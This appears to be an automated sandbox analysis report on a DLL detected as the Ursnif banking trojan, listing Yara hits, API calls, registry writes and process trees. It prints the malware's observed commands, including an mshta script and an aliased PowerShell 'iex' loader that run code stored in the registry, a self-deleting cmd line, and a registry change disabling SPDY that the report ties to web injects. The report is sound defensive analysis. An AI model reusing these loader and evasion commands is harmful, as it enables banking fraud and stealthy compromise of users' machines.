                      Source: Yara matchFile source: 00000019.00000003.416371744.0000020A9F33C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.344393693.00000000053EC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.297638770.00000000055E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.297792500.00000000055E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000019.00000003.416255152.0000020A9F33C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.342664941.00000000055E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.297847872.00000000055E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.397268016.0000000006168000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 5132, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6644, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: control.exe PID: 4084, type: MEMORYSTR
                      Source: Yara matchFile source: 2.3.rundll32.exe.50494a0.10.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.5596b40.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.5596b40.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.55694a0.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.rundll32.exe.3430000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.50494a0.10.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.55694a0.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.54ea4a0.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.54ea4a0.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000002.00000002.464317231.000000000526F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.343634422.0000000005569000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.461814934.0000000005049000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000019.00000000.414668534.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000019.00000000.413947295.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.343553499.00000000054EA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000019.00000000.415531783.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: loaddll32.exe, 00000000.00000002.254755088.000000000095B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

                      E-Banking Fraud

                      barindex
                      Yara detected Ursnif
                      Source: Yara matchFile source: 00000002.00000003.297325888.00000000055E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.297834584.00000000055E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.297429352.00000000055E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.297681439.00000000055E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.343681335.00000000055E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.297590765.00000000055E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000003.415812093.000001E636EFC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000019.00000003.416371744.0000020A9F33C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.344393693.00000000053EC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.297638770.00000000055E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.297792500.00000000055E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000019.00000003.416255152.0000020A9F33C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.342664941.00000000055E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.297847872.00000000055E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.397268016.0000000006168000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 5132, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6644, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: control.exe PID: 4084, type: MEMORYSTR
                      Source: Yara matchFile source: 2.3.rundll32.exe.50494a0.10.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.5596b40.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.5596b40.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.55694a0.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.rundll32.exe.3430000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.50494a0.10.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.55694a0.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.54ea4a0.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.54ea4a0.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000002.00000002.464317231.000000000526F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.343634422.0000000005569000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.461814934.0000000005049000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000019.00000000.414668534.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000019.00000000.413947295.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.343553499.00000000054EA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000019.00000000.415531783.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Disables SPDY (HTTP compression, likely to perform web injects)
                      Source: C:\Windows\explorer.exeRegistry key value created / modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings EnableSPDY3_0 0Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_03435FBB CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,2_2_03435FBB

                      System Summary

                      barindex
                      Writes registry values via WMI
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: xaj0e933Uv.dllStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_03434BF12_2_03434BF1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_034316452_2_03431645
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_0343829C2_2_0343829C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_0347B2382_2_0347B238
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_0348FF4D2_2_0348FF4D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_034767CA2_2_034767CA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_0348D7F12_2_0348D7F1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_0348154D2_2_0348154D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_03493DB02_2_03493DB0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_0347F2A9 CreateProcessAsUserA,2_2_0347F2A9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_03436D0A NtMapViewOfSection,2_2_03436D0A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_0343190C GetProcAddress,NtCreateSection,memset,2_2_0343190C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_03434321 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,2_2_03434321
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_034384C1 NtQueryVirtualMemory,2_2_034384C1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_03485312 NtWriteVirtualMemory,VirtualProtectEx,NtWriteVirtualMemory,RtlNtStatusToDosError,SetLastError,2_2_03485312
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_03482331 GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlImageNtHeader,RtlExitUserThread,2_2_03482331
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_03487950 NtAllocateVirtualMemory,NtAllocateVirtualMemory,RtlNtStatusToDosError,SetLastError,2_2_03487950
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_0347710A GetProcAddress,NtCreateSection,memset,2_2_0347710A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_034861AE GetProcAddress,NtWow64QueryInformationProcess64,StrRChrA,2_2_034861AE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_0348A806 NtWow64ReadVirtualMemory64,GetProcAddress,NtWow64ReadVirtualMemory64,2_2_0348A806
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_034800DC RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,memcpy,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA,2_2_034800DC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_03480782 memset,NtWow64QueryInformationProcess64,GetProcAddress,NtWow64QueryInformationProcess64,2_2_03480782
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_0348BE80 NtMapViewOfSection,2_2_0348BE80
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_03486DE0 memcpy,memcpy,memcpy,NtUnmapViewOfSection,NtClose,memset,2_2_03486DE0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_0347C431 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,2_2_0347C431
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_034774AE NtQueryInformationProcess,2_2_034774AE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_03485220 NtReadVirtualMemory,RtlNtStatusToDosError,SetLastError,2_2_03485220
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_0348EAC5 memset,memcpy,NtSetContextThread,RtlNtStatusToDosError,GetLastError,2_2_0348EAC5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_03483829 NtQuerySystemInformation,RtlNtStatusToDosError,2_2_03483829
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_034710C7 OpenProcess,GetLastError,GetProcAddress,NtSetInformationProcess,RtlNtStatusToDosError,GetProcAddress,GetProcAddress,TerminateThread,ResumeThread,CloseHandle,GetLastError,CloseHandle,2_2_034710C7
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_0347D77A NtQueryKey,NtQueryKey,lstrlenW,NtQueryKey,lstrcpyW,2_2_0347D77A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_0347B7D5 NtQueryInformationThread,GetLastError,RtlNtStatusToDosError,2_2_0347B7D5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_034736BB NtGetContextThread,RtlNtStatusToDosError,2_2_034736BB
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_034764C4 memset,NtQueryInformationProcess,2_2_034764C4
                      Source: xaj0e933Uv.dllBinary or memory string: OriginalFilenamemyfile.exe$ vs xaj0e933Uv.dll
                      Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
                      Source: xaj0e933Uv.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: xaj0e933Uv.dllVirustotal: Detection: 40%
                      Source: xaj0e933Uv.dllReversingLabs: Detection: 47%
                      Source: xaj0e933Uv.dllStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: unknownProcess created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\xaj0e933Uv.dll"
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\xaj0e933Uv.dll",#1
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\xaj0e933Uv.dll",#1
                      Source: unknownProcess created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Jqlc='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Jqlc).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>
                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name axgpbo -value gp; new-alias -name slctai -value iex; slctai ([System.Text.Encoding]::ASCII.GetString((axgpbo "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\m5pod5s5\m5pod5s5.cmdline
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5F15.tmp" "c:\Users\user\AppData\Local\Temp\m5pod5s5\CSCDE04DA8616441A6AC3074D39CFFC1D3.TMP"
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\a1gxko15\a1gxko15.cmdline
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES73F5.tmp" "c:\Users\user\AppData\Local\Temp\a1gxko15\CSCE08F5B5052974B07835021DDCFF1297.TMP"
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\xaj0e933Uv.dll
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping localhost -n 5
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\cmd.exe cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\ADE6.bi1"
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\xaj0e933Uv.dll",#1Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\xaj0e933Uv.dll",#1Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -hJump to behavior
                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name axgpbo -value gp; new-alias -name slctai -value iex; slctai ([System.Text.Encoding]::ASCII.GetString((axgpbo "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\m5pod5s5\m5pod5s5.cmdlineJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\a1gxko15\a1gxko15.cmdlineJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5F15.tmp" "c:\Users\user\AppData\Local\Temp\m5pod5s5\CSCDE04DA8616441A6AC3074D39CFFC1D3.TMP"Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES73F5.tmp" "c:\Users\user\AppData\Local\Temp\a1gxko15\CSCE08F5B5052974B07835021DDCFF1297.TMP"Jump to behavior
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\xaj0e933Uv.dllJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping localhost -n 5 Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Documents\20220504Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jkorezbb.opv.ps1Jump to behavior
                      Source: classification engineClassification label: mal100.bank.troj.evad.winDLL@25/17@0/1
                      Source: C:\Windows\System32\mshta.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dllJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_034368BD CreateToolhelp32Snapshot,Process32First,StrStrIA,Process32Next,FindCloseChangeNotification,2_2_034368BD
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\xaj0e933Uv.dll",#1
                      Source: C:\Windows\System32\control.exeMutant created: \Sessions\1\BaseNamedObjects\{B8EF3798-B76F-AA89-016C-DB7EC5603F92}
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5068:120:WilError_01
                      Source: C:\Windows\SysWOW64\rundll32.exeMutant created: \Sessions\1\BaseNamedObjects\{F0B43100-8FC3-A2DB-9924-33F6DD98178A}
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\{B8713496-B709-AA5B-016C-DB7EC5603F92}
                      Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SettingsJump to behavior
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                      Source: xaj0e933Uv.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: Binary string: Q5.pdb( source: powershell.exe, 00000012.00000003.417182776.000001E63635E000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\m5pod5s5\m5pod5s5.pdb( source: powershell.exe, 00000012.00000003.417182776.000001E63635E000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: 5.pdb@ source: powershell.exe, 00000012.00000003.560046822.000001E63635E000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000003.417182776.000001E63635E000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: ntdll.pdb source: rundll32.exe, 00000002.00000003.411412197.0000000006230000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000002.00000003.403782872.0000000006180000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: d:\in\the\town\where\ahung.pdb source: xaj0e933Uv.dll
                      Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\a1gxko15\a1gxko15.pdb source: powershell.exe, 00000012.00000003.417182776.000001E63635E000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: ntdll.pdbUGP source: rundll32.exe, 00000002.00000003.411412197.0000000006230000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000002.00000003.403782872.0000000006180000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: Q5.pdb source: powershell.exe, 00000012.00000003.560046822.000001E63635E000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: 5.pdb( source: powershell.exe, 00000012.00000003.560046822.000001E63635E000.00000004.00000020.00020000.00000000.sdmp
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_0343828B push ecx; ret 2_2_0343829B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_03437EA0 push ecx; ret 2_2_03437EA9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_034938A0 push ecx; ret 2_2_034938A9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_03493D9F push ecx; ret 2_2_03493DAF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_03473495 push ecx; mov dword ptr [esp], 00000002h2_2_03473496
                      Source: xaj0e933Uv.dllStatic PE information: section name: .erloc
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_034786AD LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,2_2_034786AD
                      Source: xaj0e933Uv.dllStatic PE information: real checksum: 0x79835 should be: 0x765e4
                      Source: m5pod5s5.dll.21.drStatic PE information: real checksum: 0x0 should be: 0xbf97
                      Source: a1gxko15.dll.24.drStatic PE information: real checksum: 0x0 should be: 0x2015
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\m5pod5s5\m5pod5s5.cmdline
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\a1gxko15\a1gxko15.cmdline
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\m5pod5s5\m5pod5s5.cmdlineJump to behavior
